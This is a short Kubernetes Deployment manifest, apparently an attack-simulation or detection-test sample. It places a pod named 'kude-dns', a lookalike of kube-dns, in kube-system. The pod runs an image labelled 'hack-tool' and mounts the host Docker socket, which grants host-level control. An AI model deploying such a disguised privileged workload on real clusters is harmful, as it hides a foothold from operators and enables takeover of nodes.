apiVersion: apps/v1
kind: Deployment
metadata:
  name: kude-dns
  namespace: kube-system
spec:
  selector:
    matchLabels:
      name: security
  replicas: 1
  template:
    metadata:
      labels:
        name: security
    spec:
      securityContext:
        fsGroup: 412
      containers:
        - name: kude-dns
          image: ilcapone/hack-tool:v03
          command: ["/bin/sh"]
          args: ["-c", "while true; sleep 10; do echo 'gas'; done"]
          imagePullPolicy: Always
          volumeMounts:
            - name: dockersock
              mountPath: "/var/run/docker.sock"
      volumes:
      - name: dockersock
        hostPath:
          path: /var/run/docker.sock
